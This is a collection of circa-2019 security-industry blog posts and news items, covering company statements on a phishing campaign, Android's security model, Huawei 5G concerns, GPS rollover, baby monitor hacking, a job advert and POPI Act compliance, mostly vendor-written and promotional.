“Avanade was a target of the multi-company security incident, involving 34 of our people in February. Through our cyber incident response efforts and technologies, we swiftly contained and remediated the situation. As a result, there was no impact to our client portfolio or sensitive company data. Our review has concluded this was isolated incident. Our security defenses have continued to protect against any potential threat related to this matter. And, we continue take our responsibility to safeguard our clients’ data with the utmost seriousness.”

Cognizant replied:

“We are aware of reports that our company was among many other service providers and businesses whose email systems were targeted in an apparent criminal hacking scheme related to gift card fraud. Since the criminal activity first surfaced earlier this week and following reports that another service provider’s email system was allegedly compromised, Cognizant’s security experts took immediate and appropriate actions including initiating a review.”

“While our review remains ongoing, we have seen no indication to date that any client data was compromised. It is not unusual for a large company like Cognizant to be the target of spear phishing attempts such as this. The integrity of our systems and our clients’ systems is of paramount importance to Cognizant. We continuously monitor, update and strengthen our systems against unauthorized access and have put additional protocols in place related to this specific industry-wide incident.”

Infosys said it has not observed any breach of its network based on its monitoring and threat intelligence. “This has been ascertained through a thorough analysis of the indicators of compromise that we received from our threat intelligence partners,” the company said in a statement.

Rackspace said it has no evidence to indicate that there has been impact to the Rackspace environment: “Rackspace Security Operations continuously monitors our environment for threats and takes appropriate action should an issue be identified.”

Capgemini said its internal Security Operation Center (SOC) detected and monitored suspicious activity that showed similar patterns to the attack faced by WIPRO. “This occurred between March 4 and March 19. The activity concentrated on a very limited number of laptops and servers. Immediate remedial action took place. There has been no impact on us, nor on our clients to date.”

Slalom, another company listed above, said it can “confirm that phishing attack activity was detected and prevented between March 4 and March 19, which correlates to the information that you have published on the Wipro event.  A combination of 24×7 Security Operations Center advanced security monitoring, security awareness training and threat intelligence automation enabled us to detect, alert, and prevent an event, sourcing from the phishing attacks.  We have verified this through internal forensics and with the support of our threat intelligence partners.”

The Android Platform Security Model



Each Android release comes with great new security and privacy features. When it comes to implementing these new features we always look at ways to measure the impact with data that demonstrates the effectiveness of these improvements. But how do these features map to an overall strategy?
Last week, we released a whitepaper describing The Android Platform Security Model. Specifically we discuss:
  • The security model which has implicitly informed the Android platform’s security design from the beginning, but has not been formally published or described outside of Google.
  • The context in which this security model must operate, including the scale of the Android ecosystem and its many form factors and use cases.
  • The complex threat model Android must address.
  • How Android’s reference implementation in the Android Open Source Project (AOSP) enacts the security model.
  • How Android’s security systems have evolved over time to address the threat model.
Android is fundamentally based on a multi-party consent1 model: an action should only happen if the involved parties consent to it. Most importantly, apps are not considered to be fully authorized agents for the user. There are some intentional deviations from the security model and we discuss why these exist and the value that they provide to users. Finally, openness is a fundamental value in Android: from how we develop and publish in open source, to the open access users and developers have in finding or publishing apps, and the open communication mechanisms we provide for inter-app interactions which facilitate innovation within the app ecosystem.
We hope this paper provides useful information and background to all the academic and security researchers dedicated to further strengthening the security of the Android ecosystem. Happy reading!
Acknowledgements: This post leveraged contributions from René Mayrhofer, Chad Brubaker, and Nick Kralevich

Notes


  1. The term ‘consent’ here and in the paper is used to refer to various technical methods of declaring or enforcing a party’s intent, rather than the legal requirement or standard found in many privacy legal regimes around the world. 

Why McAfee is Supporting the University of Guelph’s New Cyber Security and Threat Intelligence Degree Program

McAfee has a rich history in helping to shape the industry’s response to the ever-changing threat landscape.  We started as a pioneer in cybersecurity over three decades ago. Today, we are the device to cloud cybersecurity market leader, supporting consumers to small and large enterprises to governments.

But we don’t do this on our own. And in order for us to be successful in our mission to make the digital world more secure, we need to have the right people in place.

One of the largest challenges facing the cybersecurity industry today is the lack of skilled personnel and the global talent shortage. Current research indicates that our industry will face more than 1.5 million unfilled cybersecurity positions by 2025.

This talent shortage, coupled with the increasing volume of threats and the changing cybercriminal landscape, presents a problem which is only getting worse. And not just for us, but the whole industry. Therefore, we must, as a group, collectively improve upon this talent shortage.

So how will we do this?

One step that McAfee is investing heavily in is education. We are already doing a lot of work to support students and inspire them to take on careers in cybersecurity, for example our work in the UK with high school programs run at the home of the World War II code breakers Bletchley Park.

Now we’re delighted to be expanding this work even further as a founding partner of the new Master of Cybersecurity and Threat Intelligence at the University of Guelph which will launch in September this year. This graduate degree will train the next generation on how to stop cyberattacks before they happen, and give students expertise in threat intelligence, threat hunting, digital forensics, intrusion prevention, privacy, crypt analysis and more.

During the course, students will work with state-of-the-art cybersecurity tools where they can run real-world attacks within an isolated lab, engaging directly with active adversaries and learn their tactics, techniques and procedures to build state of art cyber defense and detection systems. They will learn the intricacies of how attacks are conducted and methods for preventing further intrusions. McAfee has already been involved with the development of the Lab, ensuring it replicates our real-world labs to give students the right experience from the very beginning.

But we’re not just supporting the lab. Alongside partners including Cisco and BlackBerry, we’re also going to be showing up throughout the course and inviting students to work closely with us inside McAfee to build the skills they need for a future career in cybersecurity.

As a Canadian, I am particularly proud that a Canadian institution is showing this level of innovation which will enhance not only our local talent pool but will also help solve the global talent shortage.

To learn more, and apply to be one of the founding class, visit the University of Guelph here.

The post Why McAfee is Supporting the University of Guelph’s New Cyber Security and Threat Intelligence Degree Program appeared first on McAfee Blogs.

Top Cybersecurity Concerns with Huawei 5G Dominance

The Internet of Things (IoT) is creating a need to progress cellular capabilities to provide necessary support to currently 14 billion IoT devices connected globally and growing to between 20 and 50 billion devices by 2020 (Gartner and Cisco). This includes current mobile devices, computers, smart speakers and televisions, and will include more items like digital locks, security cameras, vehicles, and household appliances. Currently, the IPv4 address space is sparse and the Internet Engineering Task Force (IETF) ratified IPv6 as an Internet Standard in July 2017. The growth of connected devices requires a larger IP scheme and network infrastructure that supports the connectivity of billions of devices at high speeds.

The next iteration for robust infrastructure is 5G, providing bandwidth up to 20 gigabits per second.  This will be implemented this year, but a complete transition will take many years, which Huawei, a Chinese Corporation, is currently leading in technology. Huawei is the second largest provider of cellular phones worldwide and the largest manufacturer of network equipment.

The U.S. Government has taken a decided stance to block the use of Huawei in the United States, filing a complaint that bans all government agencies from engaging in purchasing from Huawei and bars third parties who use the company’s equipment (BBC). Huawei is currently suing the United States because of the ban. The U.S. is not the only country taking a cautious stance with Huawei, however. They’re joined by Germany, Great Britain, Australia, Canada, and Japan, all of which are citing major security concerns with the company (MIT Technology Review).

Security Concerns with Huawei dominating the 5G space:

1.  Security Vulnerabilities in Reconfiguring Networks

The first concern is that newer 5G network equipment is almost entirely software and constantly reconfigures, challenging security agencies, who examine equipment and software for vulnerabilities and security flaws or backdoors (FreshAir). When an organization is unable to identify weaknesses in devices with constantly changing software, it becomes impossible to implement security controls to limit vulnerabilities to an acceptable level, making an organization’s or state’s data accessible.

2.  Espionage & Interference

The second concern is the possibility of China using Huawei to conduct espionage or disrupt communications. A seven-month investigation into China’s Intellectual Property (IP) theft, led by the United States Trade Representative, estimates Chinese theft of American IP has cost the U.S. between $225 billion to $600 billion annually (CNN).

China has also used the Internet to enable rampant government oppression within their borders and is now focusing on other countries and foreign businesses. China is blocking and changing data, both coming into the country and going out of the country, using what Weaver, a network security expert at the International Computer Science Institute, has coined the Great Cannon (MIT Technology Review).

It is also concerning that China will likely continue to use the Internet to control narratives, as they did when Marriott listed Tibet and Hong Kong as separate countries from China, forcing an apology from the hotel chain. Chinese officials are also going after other companies that “misidentify” Taiwan (MIT Technology Review).

3.  Foreign Nation-State Controlled Networks

The third concern, and biggest security concern for the United States, is the vastness of a network controlled by a foreign company and potentially adversarial government. As Sanger (2019) reports, “classified intelligence reports from the U.S. have warned that China would one day use Huawei to penetrate American networks for cyber-espionage or cyberattacks.” Chinese private industry and the State are tightly tied with companies being answerable to the government. Current Chinese laws state that any Chinese telecom companies would have to participate in Chinese intelligence operations (BBC).

If Huawei controls the 5G network infrastructure, the company and the Chinese government have a tremendous advantage to collect, disseminate, and control data and critical infrastructure. With IoT expanding the attack surface it is important for countries and companies to advance their security.

Because of the persistent threat environment, companies require an adaptive security program.  Hiring a Managed Security Service Provider (MSSP) to implement a security solution would help U.S. companies prepare for current and future threats by monitoring, analyzing, encrypting, and assisting in security strategies against adversarial entities.

The post Top Cybersecurity Concerns with Huawei 5G Dominance appeared first on GRA Quantum.

Managing Privacy Compliance in the Cloud

The number and complexity of regulations addressing data privacy continues to increase significantly. Companies offering cloud-based services must comply with these regulations or risk losing business due to customer trust issues and/or potential fines and other legal action. Compliance with regulations like the GDPR and CCPA requires companies to address a wide range of items, including privacy assessments, cookie consent, and data subject access requests. The digitization of data has inevitably led to a myriad of data privacy laws that span the globe. These regulations all need to be considered when doing business in the respective countries/regions to which the … Continue reading Managing Privacy Compliance in the Cloud

The post Managing Privacy Compliance in the Cloud appeared first on TrustArc Blog.

Employees Share Stories Working in Award–Winning Cork Office

“The culture at McAfee is easy going, fun, dynamic and everyone is friendly.”—Deirdre, Project Manager

The McAfee office in Cork was once again named among companies recognized in Ireland’s Great Place to Work awards. Our Cork location has much to offer—from a supportive working environment to career growth opportunities, the opportunities are abundant.

Hear from three McAfee employees, Deirdre, Ranjit and Oliver, as they share their personal stories of working in the Cork, Ireland office.

Want to join in on the fun? We’re hiring in Cork! Apply now.

For more stories like this, follow @LifeAtMcAfee on Instagram and on Twitter @McAfee to see what working at McAfee is all about.

The post Employees Share Stories Working in Award–Winning Cork Office appeared first on McAfee Blogs.

This Week in Security News: Medical Malware and Monitor Hacks

Welcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days. This week, learn how baby monitors may be susceptible to hacking. Also, learn about a medical flaw that enables hackers to hide malware.

Read on:

Is Your Baby Monitor Susceptible to Hacking?

In a number of high-profile cases, home surveillance cameras have been easily compromised and disturbing reports of hacked baby monitors are in the news. 

 

Global Governments Demonstrate Rising Commitment to Cybersecurity

According to the International Telecommunications Union’s (ITU) 2018 Global Cybersecurity Index, only half of countries around the globe had a government cybersecurity strategy in 2017, which rose to 58 percent in 2018.

What Did We Learn from the Global GPS Collapse?

The problem highlights the pervasive disconnect between the worlds of IT and OT.

Malware Creates Cryptominer Botnet Using EternalBlue and Mimikatz

A malware campaign is actively attacking Asian targets using the EternalBlue exploit and taking advantage of Living off the Land (LotL) obfuscated PowerShell-based scripts to drop Trojans and a Monero coinminer on compromised machines.

Medical Format Flaw Can Let Attackers Hide Malware in Medical Images

Research into DICOM has revealed that the medical file format in medical images has a flaw that can give threat actors a new way to spread malicious code through these images.

Hackers Could Read Your Hotmail, MSN, and Outlook Emails by Abusing Microsoft Support

A hacker or group of hackers broke into a customer support account for Microsoft, and then used that to gain access to information related to customers’ email accounts such as the subject lines of their emails and who they’ve communicated with.

New Business Email Compromise Scheme Reroutes Paycheck by Direct Deposit

A new business email compromise (BEC) scheme, where the attacker tricks the recipients into rerouting paychecks by direct deposit, has emerged.

Leadership Turnover at DHS and Secret Service Could Hurt US Cybersecurity Plans

Departures of top officials at the Secret Service and Department of Homeland Security (DHS) will add to an already difficult public-private disconnect on cybersecurity, especially since Kirstjen Nielsen has a rare set of cybersecurity skills that helped the DHS protect companies in critical industries.

Microsoft Disclosed Security Breach From Compromised Support Agent’s Credentials

Microsoft has notified affected Outlook users of a security breach that allowed hackers access to email accounts from January 1 to March 28, 2019.

Do you think the leadership turnover at DHS and the Secret Service will hurt US cybersecurity plans? Why or why not? Share your thoughts in the comments below or follow me on Twitter to continue the conversation: @JonLClay.

The post This Week in Security News: Medical Malware and Monitor Hacks appeared first on .

Why Seqrite mSuite is the perfect solution for the research industry

Estimated reading time: 2 minutes

While market research organizations may not always attract the headlines in a manner similar to financial services and educational organizations, it would not be a misnomer to state that they remain at high risk of cyber attacks. The rationale behind that is very simple – market research organizations deal with huge amounts of data every single day. In fact, their primary mode of operation is analyzing and parsing through vast amounts of data to find correlations, trends, and corollaries.

Such a huge treasure of data makes these organizations attractive targets for cybercriminals and hackers. There is also the threat of compliance with governments increasingly becoming more aware and passing rules and regulations which control the amount of data organizations can store. Market research organizations are directly at risk of non-compliance of this. The consequences can be quite costly – in 2016, a New York-based medical research institute incurred a $3.9 million penalty due to a security breach involving an unencrypted laptop.

The need for mobile security

Hence, market research organizations must ensure that they deploy strong cybersecurity solutions, especially on the mobile front as well. The proliferation of mobile phones in today’s day and age is a reality that has to be addressed by organizations in every industry. And they offer a huge number of vectors to breach an enterprise’s defenses.

Keeping the above in mind, Seqrite’s mSuite solution offers an option research organizations can explore. It is a comprehensive and powerful tool to manage all mobile devices running on Android and iOS operating systems. The solution allows network managers to get total control over all applications installed on official devices, monitor internet usage patterns, track device location and apply company policies as per the location and time, and provide support through remote device control as well as file transfer. Organizations can remain in total control of what’s happening with their data even beyond their own network.

In terms of the specific requirements which research organizations require, mSuite is well equipped with the following features:

Virtual Fencing – Enforce digital boundaries and apply restrictions on devices with Wi-Fi, Geo and Time Fence. Multiple fence groups can be created and policy restrictions can be applied.

Network Data Monitoring – Data usage can be monitored over mobile and Wi-Fi networks. Details of data, consumer, calls, SMS, and MMS sent and received can be easily accessed.

Device Security Policies – Enhanced security is offered with multiple default policies which can be customized for compliance. Policies are framed around password, app security, etc.

Customized Reporting – Standard and custom interactive reports are generated providing graphical summaries about infection status and application non-compliance.

Apart from these, research organizations can rest easy knowing their valuable data is secure thanks to a range of comprehensive mobile security and anti-theft features including:

Anti-malware – A best-in-class, built-in antivirus is provided to keep devices safe from viruses, Trojans, ransomware and cybercrime attacks.

Anti-theft – Devices can be remotely located and locked with data wiped on lost or stolen devices. On SIM change, the devices can be completely blocked or locked.

Scan Scheduler – Admins can remote schedule a Quick Scan/Full Scan at any time and monitor the status of enrolled devices for security risks and infections.

Web Security – Seqrite’s powerful browsing, phishing and web protection is in-built within the solution with the ability to blacklist/whitelist URLs or use category/keyword-based blocking.

The above features make Seqrite mSuite a great solution for research organizations when it comes to securing their mobile cybersecurity front.

The post Why Seqrite mSuite is the perfect solution for the research industry appeared first on Seqrite Blog.

5 ways to instantly detect a phishing email and save yourself from phishing attack

Phishing is a fraudulent activity to trick you into revealing your personal and confidential information. This information usually includes bank account details, net banking details, credit/debit card numbers, login ID and passwords. Every day, countless people become unsuspecting victims of phishing attacks. With cyber criminals adopting sophisticated modes of phishing…

How do I stop old USB drives from infecting my new Windows PC?

Jason wants to protect his new high-end laptop from viruses but needs data on old SD cards

I’ve just bought a high-end Windows laptop for video editing while travelling around Europe. What steps can I take to prevent any possible infections from being passed on from previous machines on SD cards and external hard drives? Some of the external hard drives go back to machines from 2004 but I have never plugged any of them into any computers other than my own previous Macs and PCs. I work professionally with video, photography and coding, so all of this data is vital.

I have a five-machine Bitdefender licence but I’d be prepared to use another protection system, and I’ve looked at Sophos Intercept X. Jason

There are at least three things to think about. First, there’s the threat level: how at risk are you? Second, there’s provenance: how much do you know about your devices? Third, how can you mitigate any risks revealed by the answers to the first two questions?

Continue reading...

What Did We Learn from the Global GPS Collapse?

On April 6, 2019, a ten-bit counter rolled over. The counter, a component of many older satellites, marks the weeks since Jan 1, 1980. It rolled over once before, in the fall of 1999. That event was inconsequential because few complex systems relied on GPS. Now, more systems rely on accurate time and position data: automated container loading and unloading systems at ports, for example. The issue was not with the satellites or with the cranes.

The problem highlights the pervasive disconnect between the worlds of IT and OT. Satellites are a form of industrial control system. Engineers follow the same set of principles designing satellites as they do designing any other complex programmable machine. Safety first, service availability next.

In the 1990s satellites suffered a series of failures, prompting the US General Accounting Office (GAO) to review satellite security. The report (at https://www.gao.gov/products/GAO-02-781) identifies two classes of problems that might befall satellites, shown in these two figures.

Figure 1: Unintentional Threats to Satellites

Figure 2: Intentional Threats to Satellites

This analysis is incomplete. It omits an entire class of problems: software design defects and code bugs. The decision to use a 10-bit counter to track the passing weeks is a design defect. The useful life of a satellite can be 40 years or more. A 10-bit counter runs from 0 to 1,023, then rolls over to zero. Since the are 52 weeks in a year, the counter does not quite make it to 20 years. This design specification was dramatically under-sized. More recent designs use a 13-bit counter, which will not roll over for almost 160 years. That provides an adequate margin.

As for code bugs, satellites suffer them just like any other programmable system. The Socrates network tracks satellites to project potential collisions. In 2009, Socrates predicted that two satellites, a defunct Soviet-era communications satellite and the Iridium constellation satellite #33, were projected to pass 564 meters apart. In reality, they collided, creating over 2,000 pieces of debris larger than 1 cm in size. Whether the defect arose from buggy code or inadequate precision in observations, the satellites collided. Either way, there is a software defect here. The question is, is the software inaccurate, or is it creating precision that does not exist? If the instruments doing the measurement have a margin of error, the report should include that data. By stating that the satellites will pass 564 meters apart, the value implies a precision of ½ meter either way – between 563.5 meters and 564.5 meters. If the precision is within half a kilometer, the software should state that specifically – “Possible collision – distance between objects under 1 KM.” If the input data is precise, then the code is calculating the trajectories incorrectly. Either is a code bug.

These two types of defects are neither unintentional (code and designs do not degrade over time) nor intentional (no saboteur planted the defect). The third class of defect results from inconsistent design specifications (the satellite can live for 40 years but the counter rolls over in 20) or poor coding practices (creating a level of precision unsupported by the measurements, or calculating the trajectories incorrectly). These are software defects.

As we all know, there was no failure in the GPS system. I made a passing comment during a talk on satellite security at the RSA 2019 conference. A reporter from Tom’s Guide was there, and he wrote an excellent article on the problem: https://www.tomsguide.com/us/gps-mini-y2k-rsa2019,news-29583.html.

The failure is not including software issues among the risks to a programmable device.

What do you think? Let me know below or @WilliamMalikTM.

The post What Did We Learn from the Global GPS Collapse? appeared first on .

Is Your Baby Monitor Susceptible to Hacking?

There’s no doubt that digital technology, in many of its forms, brings everyday tasks much closer-to-hand. From discovering breaking news, to online shopping, to keeping tabs on your home via security cameras—everything is within the touch of a button. Even so, with the growing reach of the Internet of Things (IoT), new and unsuspected threats are just around the corner—or are already here. 

One of the most alarming threats to emerge is the breach of privacy. In a number of high-profile cases, home surveillance cameras have been easily compromised and disturbing reports of hacked baby monitors are in the news.

For example, in early January of this year, a Western Australian mother voiced her worries when she discovered that the baby monitor she recently purchased was compromised. The monitor allowed her to log in with a QR code and a generic password in order to watch her child through a camera. Though she followed the instructions for installation, upon opening the monitoring website she was greatly alarmed to see a vision of a stranger’s bedroom, rather than her child’s.

This type of case isn’t isolated, as another report surfaced last year when a stranger allegedly hacked a baby monitor camera to watch a mother breastfeed. In yet another case, a Texas couple, whose devices were hacked, said they heard a man’s voice coming from their baby monitor threatening to kidnap their child. It doesn’t get much scarier than that.

Though you might not have prepared for it, it’s increasingly clear you need to take steps to protect yourself, your children, your privacy, and your new smart devices from these kinds of emerging privacy threats, as well as others. As a first precaution, you should always remember to change the default passwords on all your networked devices, starting with your router, creating strong new ones and securing them safely whenever possible with a password manager. You should then pick the best endpoint and network security solutions you can find to protect all the networked devices in your home.

Trend Micro Password Manager provides a password manager that lets you generate and sync strong passwords across your PCs, Macs, Android, and iOS devices.

In addition, Trend Micro Security provides the best endpoint security for PCs, Macs, Android and iOS—a key part of any home security strategy. Trend Micro Maximum Security includes Trend Micro Mobile Security as part of its subscription, so you can protect up to 10 devices.

Finally, Trend Micro Home Network Security is specifically designed to protect all your new “smart” connected devices in the home. It filters incoming and outgoing traffic to provide an extra layer of protection against intrusions or hacking of the home network. It protects your router and a wide range of smart devices, including security cameras, child monitoring devices, smart TVs, refrigerators, smart speakers, and even smart doorbells and thermostats, from emerging IoT threats—and the list goes on.

With our endpoint and network security solutions, we’ve got you covered! Click the links above for more details on our solutions.

The post Is Your Baby Monitor Susceptible to Hacking? appeared first on .

We are hiring – Senior Cybersecurity Consultant

Due to the continued expansion of our DPO as a Service, and CSO as a Service offerings, BH Consulting is now seeking to recruit a Senior Cybersecurity Consultant to join its growing team.

BH Consulting is a dynamic and fast-paced cybersecurity and data protection consulting firm. We provide a market leading range of information security services focused on GDPR, cybersecurity, cyber risk, digital forensics, ISO 27001, and awareness training.

We have a vast range of clients from private and public sector organisations, to large global multinational organisations. We operate both domestically in Ireland and Internationally with our head office located in Dublin.

The trust relationship with our customers underpins the fibre of our organisation. We nurture this trust relationship by investing time and resource to understand our customer’s business needs and we provide advise that aligns with those needs.

Our team is passionate about successfully addressing the cybersecurity and data protection issues our customers have. We continue our journey to grow and expand and have established a new senior role within our organisation to support this growth.

Who are we looking for?

A senior cyber-security consultant who will work closely with the Chief Operations Office, and the CEO, Brian Honan. You  will help BH maintain its customer relationships by delivering to existing clients and you will also help to win new business. You will be an ambassador for BH’s trusted brand and your calibre will reflect this.

Who are you?

You are a Senior Cyber-security Consultant, with a wealth of experience at both a technical level and at senior management level. You have a reputation as both a thought leader in cyber-security and data protection, and a strong technical background combined with senior leadership skills.. You a dynamic individual who likes to be challenged and you have an in-depth knowledge of cyber risk management, cybersecurity, cyber strategy, data protection and business strategy. You will be able to understand the needs of both the C suite and on-the-ground teams and you will be able to talk to both audiences. You are target driven, and passionate about helping customers solve their cybersecurity and data protection risks. 

Details of the role

  • Develop stakeholder relationships with executive management in our clients, and proactively develop ongoing service and product recommendations for these clients based on their business needs
  • Define and provide pragmatic security guidance and architectures that balance business benefit and risk
  • Assess and advise on cyber-governance models, data governance models, risk management programs, and data protection compliance frameworks
  • Deliver cybersecurity risk assessments, running assessment workshops with clients
  • Audit and review client cyber projects
  • Examine clients cyber-security controls and make appropriate and practical recommendations that achieve robust security or compliance outcomes
  • Consult on security considerations based on system delivery models including internally, hosted, cloud hosted, cloud managed, mobile, etc.
  • Provide pre-sales advice and support, working alongside account managers
  • Research emerging threats, vulnerabilities and security practices/standards to maintain professional relevance
  • Provide complex technical advice, recommendations and consultancy regarding networks, infrastructure, products and services
  • Provide guidance around IaaS, SaaS, and PaaS security best practices
  • Enable clients to achieve certification to the ISO 27001:2013 Information Security Standard.

Your responsibilities

  • Ensure that all BH Consulting clients receive a professional service in line with our company ethos and values
  • Ensuring a first-class service to clients is delivered on time and within budget
  • Planning and leading projects while effectively managing resources.
  • Leading and mentoring junior team members ensuring a high standard is maintained in line with KPIs
  • Demonstrating confidence of a strong technical skillset to clients in relation to cyber-defence and incident response
  • Delivering independent trusted advisory services to our clients to enable them to manage their risk profile
  • Enable clients achieve certification to the ISO 27001:2013 Information Security Standard
  • Work with clients to ensure adherence to regulatory, legal, and relevant governance frameworks
  • Manage client relationships and accounts
  • Meet and exceed all KPIs and revenue targets
  • Plan and attend relevant events and conferences to promote the BH Consulting brand.

Core competencies

  • Excellent technical knowledge of cyber-security, information technology, and business risk
  • Strong business understanding and acumen
  • Excellent written and verbal communications skills, able to use a variety of communications styles, language, and media, to effectively build relationships with key stakeholders
  • Have strong attention to detail and ability to present that detail in a dynamic manner based on its audience
  • Excellent planning skills together with project management and prioritisation skills
  • Delivery focused – ensuring projects are delivered on time and within budget
  • Strong analytical problem-solving capabilities
  • Ability to work on own initiative, yet also strong team player
  • Comprehensive understanding of risk management principles and effective risk response strategies
  • Passion and drive – willingness to go that extra mile to achieve a target/objective
  • Be willing to travel both within Ireland and internationally to our widely diverse client base
  • Resilience – ability to meet challenges and pressures head-on and to manage and address set-backs as encountered
  • Collaborative – ability to cooperate and to communicate well, and to resolve differences of opinion quickly and mutually
  • Flexible and adaptable – ability to improvise and adapt to a dynamic business environment.

If this role interests you and you want to join an exciting and growing company, please send your CV to info@bhconsulting.ie.

The post We are hiring – Senior Cybersecurity Consultant appeared first on BH Consulting.

Enterprises non-compliant with POPI Act in South Africa can get fined up to R10 million!

Estimated reading time: 3 minutes

From GDPR in the European Union to now the POPI Act in South Africa, data privacy regulation is slowly making its way across the globe.

The Protection of Personal Information (POPI) Act was passed in South Africa in 2013 and will soon come into effect across the entire country. Like the GDPR in EU, it marks a wide-ranging regulation on data privacy, personal information and data consent which will have a huge impact on how enterprises do businesses across the entire country. A recent report suggested that only 34% of organizations were compliant with the Act which makes it a troubling scenario.

If you are an organization based in the country, here is some information which you absolutely need to know:

What is the POPI Act?

The short-form of the Protection of Personal Information Act, this is a legislation which was passed in 2013 but is yet to be enacted. As per the official South African government website, it is aimed at the following:

  • to promote the protection of personal information processed by public and private bodies;
  • to introduce certain conditions so as to establish minimum requirements for the processing of personal information;
  • to provide for the establishment of an Information Regulator to exercise certain powers and to perform certain duties and functions in terms of this Act and the Promotion of Access to Information Act, 2000;
  • to provide for the issuing of codes of conduct;
  • to provide for the rights of persons regarding unsolicited electronic communications and automated decision making;
  • to regulate the flow of personal information across the borders of the Republic; and
  • to provide for matters connected therewith.

When will it come into effect?

Even though the act was passed in 2013, it is yet to come into effect due to governmental regulations. Currently, the wait is on for a Regulator to be established but most analysts feel it is not long before it comes into effect.

Who will it affect?

The act is intended to regulate how South African businesses collect, store, process and share personal information. Going by that definition, all South African businesses will be affected.

How is personal information defined?

The Act defines “personal information” as information related to an identifiable, living natural person which can include:

  1. Information related to personal differentiators such as race, sex, gender, pregnancy, marital status, etc.
  2. Information related to education, medical history, employment history, etc.
  3. Identifying numbers, symbols, email addresses, physical address etc.
  4. Biometric information
  5. Personal views, opinions
  6. Correspondence sent by the person, etc.

How will it identify businesses?

For starters, businesses have to classify what information they collect about data subjects as “personal information”.  There are regulations as to how companies can handle personal information which they will have to comply with, apart from exceptions as well. “Records” and “sensitive information” must also be identified and stakeholders will have to be notified in case of any data breaches.

What are the penalties of non-compliance?

Non-compliance can invite serious penalties. It could involve imprisonment for a period of up to 10 years or a fine of up to R10 million (rand), or in some cases, both.

Keeping all this in mind, it is imperative that South African enterprises start preparing for the inevitable and set in motion processes which will ensure full compliance with POPI.

As an IT security partner for your business, Seqrite provides comprehensive security from advanced cyber threats. To know more

The post Enterprises non-compliant with POPI Act in South Africa can get fined up to R10 million! appeared first on Seqrite Blog.

Federal, State Cyber Resiliency Requires Action

It is no shock that our state and local infrastructures are some of the most sought-after targets for foreign and malicious cyber attackers, but the real surprise lies in the lack of preventive measures that are able to curb them. Major attention has been drawn to the critical gaps that exist as a result of an ever-expanding attack surface, making old system architectures an increasing liability.

Recently, the city of Albany, New York became a victim of a ruthless ransomware attack, which created a series of municipal service interruptions. Residents weren’t able to use the city’s services to obtain birth certificates, death certificates or marriage licenses, and the police department’s networks were rendered inoperable for an entire day. This resulted in an enormous disruption of the city’s functionality and made clear that the threat to infrastructure is more real than ever. Bolstering state and local digital defenses should be of the utmost priority, especially as we near the 2020 presidential elections when further attacks on election infrastructure are expected. We must take the necessary precautions to mitigate cyberattack risk.

The reintroduction of the State Cyber Resiliency Act by Senators Mark Warner (D-VA) and Cory Gardner (R-CO), and Representatives Derek Kilmer (D-WA) and Michael McCaul (R-TX), does just that. The legislation demonstrates a critical bipartisan effort to ensure that state, local and tribal governments have a robust capacity to strengthen their defenses against cybersecurity threats and vulnerabilities through the Department of Homeland Security (DHS). States have made clear that they suffer from inadequate resources to deal with increasingly sophisticated attacks, but also the most basic attacks, which require proper safeguards and baseline protection. This bill works to strategically address the challenges posed by a lack of resources to deal with emerging threats.

The possibility of cyber warfare must not be taken lightly and has long gone ignored. This bill shows that the status quo of kicking the can further down the road will no longer stand as a “strategy” in today’s political and cybersecurity landscape. Action is necessary to better secure our national security and the systems upon which every sector of our economy relies, from utilities to banking to emergency first responders to hospital networks to election infrastructure. It is our responsibility to create and support the safeguards against bad actors looking for gaps in our infrastructure.

The bill makes states eligible for grants to implement comprehensive, flexible cybersecurity plans that address continuous vulnerability monitoring, protection for critical infrastructure systems and a resilient cybersecurity workforce. States would also be able to repurpose funds to various local and tribal governments. In addition, the bill would implement a 15-person committee to review the proposed plans and track the spending of state and local governments. This committee would help states and localities formulate and deliver annual reports to Congress that detail the program’s progress. The specific funding was not disclosed, but this effort showcases the timeliness of the issue and why it is such an imperative step at this stage in time.

We must take basic steps to ensure the security of our state and local systems, and enable systems to be patched, maintained and protected from outside threats. This bill is a welcomed and needed effort by lawmakers to address the existing challenges states and local governments and infrastructures are dealing with every day.  As adversaries become increasingly sophisticated and targeted in their attack strategies, we have a responsibility to best equip states and localities with the necessary tools to close gaps and mitigate gaps.

We at McAfee are committed to partnering with federal, state and local governments to equip them with the best strategies to create a better and more secure cybersecurity future.

The post Federal, State Cyber Resiliency Requires Action appeared first on McAfee Blogs.

Continuing Education On Cyber Threats And Defenses

Anyone who has been in cybersecurity for any length of time knows, the threat landscape is constantly changing and requires regularly monitoring of news, blogs, podcasts, and other ways to ensure you know what is happening today. I have tried to bring this information to the public since starting my monthly threat webinar series in July of 2015. Over the years, I’ve been able to share information about the different aspects of the threat landscape from advanced persistent threats (APT) to zero-day exploits and everything in-between. My focus with these webinars is to share information about how these threats work and the technologies available to defend against them. I regularly have experts join me on these webinars too, so you don’t have to just listen to me all the time.

However, my main goal is to help you better understand what you are up against in your fight against threat actors and their ways of attacking you, your employees, systems and networks. I also ask for requests on topics you want me to cover in the future using a survey option within our webinar platform we use. Each of the webinars is live and allows you to ask questions to be answered either during the live event or afterwards via an email. We also record each of these webinars and you can watch them on-demand, as we know your time is valuable and sometimes you cannot attend it live or you want to share with your colleagues. Note – if you sign up for any of the on-demand webinars, you will receive an email with the upcoming month’s webinar topic. The April 2019 webinar will cover Bug Bounties and How They Help and you can sign up to attend here.

Webinars are one way we can help you stay educated and up-to-date about the industry and what’s happening today, as well as what we expect to happen next. You can also follow our other blogs, like Security Intelligence or Security News, for the latest from Trend Micro Research. We also have great explanatory videos on our Trend Micro YouTube channel.

Feel free to leave a comment below if there are any topics you’d like me to cover in upcoming months or if you simply want to say hello. I look forward to seeing you on one of my next webinars.

The post Continuing Education On Cyber Threats And Defenses appeared first on .

Why choose Seqrite mSuite- we give you 5 reasons!

Estimated reading time: 2 minutes

Smartphones are no longer luxuries – in today’s day and age, they are an omnipresent reality. Mobile devices do not just offer connectivity anymore, there are used for many business functions. Business emails, document reviews, editing, and video conferencing are just some of those. To support a mobile workforce, companies issue handhelds such as smartphones, tablets, and laptops that enable them to work while traveling or while sitting at the comfort of their homes. Some companies also support the ‘Bring Your Own Device (BYOD)’ concept which permits employees to access company network from their personal handhelds.

